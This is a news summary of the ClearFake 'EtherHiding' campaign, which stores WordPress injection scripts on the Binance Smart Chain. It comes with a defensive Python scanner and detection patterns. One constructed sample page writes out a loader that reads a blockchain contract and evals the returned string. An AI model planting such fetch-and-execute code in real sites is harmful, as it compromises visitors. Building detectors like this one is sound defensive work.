BleepingComputer reports that the ClearFake threat operation has concealed malicious scripts used in the compromise of WordPress sites in the blockchain, using a new code-distribution technique dubbed EtherHiding that leverages the Binance Smart Chain in a bid to better evade detection.
According to a report from Guardio Labs, vulnerable WordPress sites have been injected with a script that loads the BSC JS library, which is then used to retrieve malicious scripts stored on the blockchain and inject them into the page, after which a third-stage payload is downloaded from the command-and-control server. These payloads display fraudulent overlays on the site urging visitors to update their browser; clicking the prompt redirects them to sites that download a malicious executable.
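The chain described above (injected loader script, BSC client library, contract read, execution of the returned string) gives a defender something to look for in rendered page output. The following heuristic scanner is an added example, not code from the report or from Guardio Labs; the library name, RPC hostname pattern and sample pages are assumptions constructed for illustration, not published indicators.

```python
import re

# Heuristic detector for EtherHiding-style injections in rendered WordPress pages.
# It looks for the stages the report describes: a script that loads a web3/BSC
# client library, a Binance Smart Chain RPC endpoint, a contract read, and
# dynamic execution of whatever string the contract returns. The patterns are
# assumptions for illustration, not indicators published with the report.
SIGNALS = {
    "web3_library": re.compile(r"<script[^>]*src=[\"'][^\"']*web3[^\"']*\.js[\"']", re.I),
    "bsc_rpc": re.compile(r"https?://bsc-dataseed\d*\.binance\.org", re.I),
    "contract_read": re.compile(r"\beth\.Contract\b|\beth_call\b|\.call\(", re.I),
    "dynamic_exec": re.compile(r"\b(?:eval|Function)\s*\(|document\.write\s*\(|\.innerHTML\s*=", re.I),
}


def scan_html(html: str) -> dict:
    """Return the matched signal names and a verdict for one page's HTML."""
    hits = {name: bool(rx.search(html)) for name, rx in SIGNALS.items()}
    chain_access = hits["web3_library"] or hits["bsc_rpc"]
    if chain_access and hits["contract_read"] and hits["dynamic_exec"]:
        verdict = "suspicious"      # full chain present: fetch from chain and execute
    elif chain_access and (hits["contract_read"] or hits["dynamic_exec"]):
        verdict = "review"          # partial chain: could be a legitimate dApp widget
    else:
        verdict = "clean"           # dynamic DOM code alone is normal on a WordPress site
    return {"signals": [n for n, h in hits.items() if h], "verdict": verdict}


# Constructed sample pages (not real captures). The contract address is a placeholder.
INJECTED_PAGE = """<html><head><title>Blog</title>
<script src="https://cdn.example.invalid/web3.min.js"></script>
<script>
const w3 = new Web3("https://bsc-dataseed1.binance.org");
const c = new w3.eth.Contract(ABI, "0xCONTRACT_ADDRESS_PLACEHOLDER");
c.methods.get().call().then(s => eval(w3.utils.hexToAscii(s)));
</script></head><body>post body</body></html>"""

CLEAN_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>jQuery(function () { document.getElementById('x').innerHTML = 'hi'; });</script>
</head><body>post body</body></html>"""

if __name__ == "__main__":
    for label, page in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(label, scan_html(page))
```

Run it against HTML as the browser receives it (after any PHP-level injection), since the loader is inserted server-side by the compromised site.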
The technique follows two months in which ClearFake used hijacked WordPress sites to deliver malicious injections hosted on Cloudflare Worker hosts.
"While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they've quickly pivoted to take advantage of the decentralized, anonymous, and public nature of blockchain. This campaign is up and harder than ever to detect and take down," said Guardio Labs.